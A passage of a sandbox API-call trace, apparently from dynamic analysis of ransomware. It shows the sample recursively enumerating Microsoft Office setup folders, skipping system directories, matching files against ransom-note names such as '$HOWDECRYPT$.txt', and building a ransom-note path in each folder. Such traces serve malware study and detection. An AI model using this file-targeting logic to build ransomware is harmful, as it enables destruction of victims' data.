returned 1 [0087.742] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.742] lstrcmpiW (lpString1="Excel.en-us", lpString2="System Volume Information") returned -1 [0087.742] lstrlenW (lpString="System Volume Information") returned 25 [0087.742] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned 95 [0087.742] lstrcmpW (lpString1="Excel.en-us", lpString2=".") returned 1 [0087.742] lstrcmpW (lpString1="Excel.en-us", lpString2="..") returned 1 [0087.742] GetProcessHeap () returned 0x2c0000 [0087.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387280 [0087.742] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*") returned 97 [0087.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.743] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.743] lstrlenW (lpString="Windows") returned 7 [0087.743] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.743] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.743] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.743] lstrlenW (lpString="System Volume Information") returned 25 [0087.743] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\.") returned 97 [0087.743] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.743] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.743] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.743] lstrlenW (lpString="Windows") returned 7 [0087.743] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.743] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.743] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.743] lstrlenW (lpString="System Volume Information") returned 25 [0087.743] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\..") returned 98 [0087.743] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.743] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.743] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.743] lstrcmpiW (lpString1="ExcelMUI.XML", lpString2="Windows") returned -1 [0087.743] lstrlenW (lpString="Windows") returned 7 [0087.744] lstrcmpiW (lpString1="ExcelMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.744] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.744] lstrcmpiW (lpString1="ExcelMUI.XML", lpString2="System Volume Information") returned -1 [0087.744] lstrlenW (lpString="System Volume Information") returned 25 [0087.744] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0087.744] StrStrIW (lpFirst="ExcelMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.744] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.744] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.744] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0087.744] GetProcessHeap () returned 0x2c0000 [0087.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x353bb0 [0087.745] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0xa98) returned 0x378050 [0087.745] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.745] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.745] lstrlenW (lpString="Windows") returned 7 [0087.745] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.745] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.746] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.746] lstrlenW (lpString="System Volume Information") returned 25 [0087.746] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0087.746] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.746] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.746] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0087.746] GetProcessHeap () returned 0x2c0000 [0087.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x114) returned 0x353cd8 [0087.746] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xaa0) returned 0x378050 [0087.746] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.746] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.746] wnsprintfW (in: pszDest=0x387280, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\$HOWDECRYPT$.txt") returned 112 [0087.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\$HOWDECRYPT$.txt") returned 112 [0087.746] GetProcessHeap () returned 0x2c0000 [0087.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x122) returned 0x353df8 [0087.746] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xaa8) returned 0x378050 [0087.746] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.746] lstrcmpiW (lpString1="Groove.en-us", lpString2="Windows") returned -1 [0087.746] lstrlenW (lpString="Windows") returned 7 [0087.746] lstrcmpiW (lpString1="Groove.en-us", lpString2="$Recycle.bin") returned 1 [0087.746] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.746] lstrcmpiW (lpString1="Groove.en-us", lpString2="System Volume Information") returned -1 [0087.747] lstrlenW (lpString="System Volume Information") returned 25 [0087.747] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned 96 [0087.747] lstrcmpW (lpString1="Groove.en-us", lpString2=".") returned 1 [0087.747] lstrcmpW (lpString1="Groove.en-us", lpString2="..") returned 1 [0087.747] GetProcessHeap () returned 0x2c0000 [0087.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.747] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*") returned 98 [0087.747] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.792] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.792] lstrlenW (lpString="Windows") returned 7 [0087.792] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.792] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.792] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.792] lstrlenW (lpString="System Volume Information") returned 25 [0087.792] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\.") returned 98 [0087.792] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.792] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.792] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.792] lstrlenW (lpString="Windows") returned 7 [0087.793] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.793] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.793] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.793] lstrlenW (lpString="System Volume Information") returned 25 [0087.793] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\..") returned 99 [0087.793] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.793] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.793] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.793] lstrcmpiW (lpString1="GrooveMUI.XML", lpString2="Windows") returned -1 [0087.793] lstrlenW (lpString="Windows") returned 7 [0087.793] lstrcmpiW (lpString1="GrooveMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.793] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.793] lstrcmpiW (lpString1="GrooveMUI.XML", lpString2="System Volume Information") returned -1 [0087.793] lstrlenW (lpString="System Volume Information") returned 25 [0087.793] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0087.793] StrStrIW (lpFirst="GrooveMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.794] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.794] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.794] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0087.794] GetProcessHeap () returned 0x2c0000 [0087.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11e) returned 0x353df8 [0087.794] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xa98) returned 0x378050 [0087.794] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.794] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.794] lstrlenW (lpString="Windows") returned 7 [0087.794] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.794] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.794] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.794] lstrlenW (lpString="System Volume Information") returned 25 [0087.794] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 106 [0087.794] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.794] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.795] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.795] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 106 [0087.795] GetProcessHeap () returned 0x2c0000 [0087.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x116) returned 0x37b348 [0087.795] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xaa0) returned 0x378050 [0087.795] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.795] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.820] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\$HOWDECRYPT$.txt") returned 113 [0087.820] GetProcessHeap () returned 0x2c0000 [0087.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x124) returned 0x35e048 [0087.820] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xaa8) returned 0x378050 [0087.820] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.820] lstrcmpiW (lpString1="InfoPath.en-us", lpString2="Windows") returned -1 [0087.821] lstrlenW (lpString="Windows") returned 7 [0087.821] lstrcmpiW (lpString1="InfoPath.en-us", lpString2="$Recycle.bin") returned 1 [0087.821] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.821] lstrcmpiW (lpString1="InfoPath.en-us", lpString2="System Volume Information") returned -1 [0087.821] lstrlenW (lpString="System Volume Information") returned 25 [0087.821] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned 98 [0087.821] lstrcmpW (lpString1="InfoPath.en-us", lpString2=".") returned 1 [0087.821] lstrcmpW (lpString1="InfoPath.en-us", lpString2="..") returned 1 [0087.821] GetProcessHeap () returned 0x2c0000 [0087.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.821] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*") returned 100 [0087.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.827] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.827] lstrlenW (lpString="Windows") returned 7 [0087.827] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.827] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.827] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.827] lstrlenW (lpString="System Volume Information") returned 25 [0087.827] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\.") returned 100 [0087.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.827] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.828] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.828] lstrlenW (lpString="Windows") returned 7 [0087.828] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.828] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.828] lstrlenW (lpString="System Volume Information") returned 25 [0087.828] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\..") returned 101 [0087.828] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.828] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.828] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.828] lstrcmpiW (lpString1="InfoPathMUI.XML", lpString2="Windows") returned -1 [0087.828] lstrlenW (lpString="Windows") returned 7 [0087.828] lstrcmpiW (lpString1="InfoPathMUI.XML", lpString2="$Recycle.bin") returned 1 [0087.828] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.828] lstrcmpiW (lpString1="InfoPathMUI.XML", lpString2="System Volume Information") returned -1 [0087.828] lstrlenW (lpString="System Volume Information") returned 25 [0087.828] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0087.828] StrStrIW (lpFirst="InfoPathMUI.XML", lpSrch=".spyhunter") returned 0x0 [0087.828] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.828] lstrcmpW (lpString1="InfoPathMUI.XML", lpString2="_uninstalling_.png") returned 1 [0087.828] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 114 [0087.828] GetProcessHeap () returned 0x2c0000 [0087.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x126) returned 0x35e178 [0087.828] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xaa8) returned 0x378050 [0087.829] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.829] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0087.829] lstrlenW (lpString="Windows") returned 7 [0087.829] lstrcmpiW (lpString1="SETUP.XML", lpString2="$Recycle.bin") returned 1 [0087.829] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.829] lstrcmpiW (lpString1="SETUP.XML", lpString2="System Volume Information") returned -1 [0087.829] lstrlenW (lpString="System Volume Information") returned 25 [0087.829] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0087.829] StrStrIW (lpFirst="SETUP.XML", lpSrch=".spyhunter") returned 0x0 [0087.829] lstrcmpW (lpString1="SETUP.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.829] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0087.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 108 [0087.829] GetProcessHeap () returned 0x2c0000 [0087.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11a) returned 0x35e2a8 [0087.829] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xab0) returned 0x35e3d0 [0087.829] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0087.829] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0087.829] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\$HOWDECRYPT$.txt") returned 115 [0087.829] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\$HOWDECRYPT$.txt") returned 115 [0087.829] GetProcessHeap () returned 0x2c0000 [0087.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x128) returned 0x35ee88 [0087.829] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x35e3d0, Size=0xab8) returned 0x378050 [0087.830] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.830] lstrcmpiW (lpString1="ODeploy.exe", lpString2="Windows") returned -1 [0087.830] lstrlenW (lpString="Windows") returned 7 [0087.830] lstrcmpiW (lpString1="ODeploy.exe", lpString2="$Recycle.bin") returned 1 [0087.830] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.830] lstrcmpiW (lpString1="ODeploy.exe", lpString2="System Volume Information") returned -1 [0087.831] lstrlenW (lpString="System Volume Information") returned 25 [0087.831] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0087.831] StrStrIW (lpFirst="ODeploy.exe", lpSrch=".spyhunter") returned 0x0 [0087.831] lstrcmpW (lpString1="ODeploy.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.831] lstrcmpW (lpString1="ODeploy.exe", lpString2="_uninstalling_.png") returned 1 [0087.831] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\ODeploy.exe") returned 95 [0087.831] GetProcessHeap () returned 0x2c0000 [0087.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x353f20 [0087.831] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xac0) returned 0x378050 [0087.831] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0087.831] lstrcmpiW (lpString1="Office.en-us", lpString2="Windows") returned -1 [0087.831] lstrlenW (lpString="Windows") returned 7 [0087.831] lstrcmpiW (lpString1="Office.en-us", lpString2="$Recycle.bin") returned 1 [0087.831] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.831] lstrcmpiW (lpString1="Office.en-us", lpString2="System Volume Information") returned -1 [0087.831] lstrlenW (lpString="System Volume Information") returned 25 [0087.831] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us") returned 96 [0087.831] lstrcmpW (lpString1="Office.en-us", lpString2=".") returned 1 [0087.831] lstrcmpW (lpString1="Office.en-us", lpString2="..") returned 1 [0087.831] GetProcessHeap () returned 0x2c0000 [0087.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0087.832] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*") returned 98 [0087.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0087.846] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.846] lstrlenW (lpString="Windows") returned 7 [0087.846] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.846] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.846] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.846] lstrlenW (lpString="System Volume Information") returned 25 [0087.846] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\.") returned 98 [0087.846] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.846] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.847] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.847] lstrlenW (lpString="Windows") returned 7 [0087.847] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.847] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.847] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.847] lstrlenW (lpString="System Volume Information") returned 25 [0087.847] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\..") returned 99 [0087.847] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.847] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.847] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.847] lstrcmpiW (lpString1="BRANDING.DLL", lpString2="Windows") returned -1 [0087.847] lstrlenW (lpString="Windows") returned 7 [0087.847] lstrcmpiW (lpString1="BRANDING.DLL", lpString2="$Recycle.bin") returned 1 [0087.847] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.847] lstrcmpiW (lpString1="BRANDING.DLL", lpString2="System Volume Information") returned -1 [0087.847] lstrlenW (lpString="System Volume Information") returned 25 [0087.847] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0087.847] StrStrIW (lpFirst="BRANDING.DLL", lpSrch=".spyhunter") returned 0x0 [0087.847] lstrcmpW (lpString1="BRANDING.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.847] lstrcmpW (lpString1="BRANDING.DLL", lpString2="_uninstalling_.png") returned 1 [0087.847] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0087.847] GetProcessHeap () returned 0x2c0000 [0087.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x11c) returned 0x35e3d0 [0087.847] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x378050, Size=0xac8) returned 0x379b20 [0087.848] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0087.848] lstrcmpiW (lpString1="BRANDING.XML", lpString2="Windows") returned -1 [0087.848] lstrlenW (lpString="Windows") returned 7 [0087.848] lstrcmpiW (lpString1="BRANDING.XML", lpString2="$Recycle.bin") returned 1 [0087.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0087.848] lstrcmpiW (lpString1="BRANDING.XML", lpString2="System Volume Information") returned -1 [0087.848] lstrlenW (lpString="System Volume Information") returned 25 [0087.848] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0087.848] StrStrIW (lpFirst="BRANDING.XML", lpSrch=".spyhunter") returned 0x0 [0087.848] lstrcmpW (lpString1="BRANDING.XML", lpString2="$HOWDECRYPT$.txt") returned 1 [0087.848] lstrcmpW (lpString1="BRANDING.XML", lpString2="_uninstalling_.png") returned 1 [0087.848] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0087.848] GetProcessHeap () returned 0x2c0000 [0087.848] RtlAllocateHeap 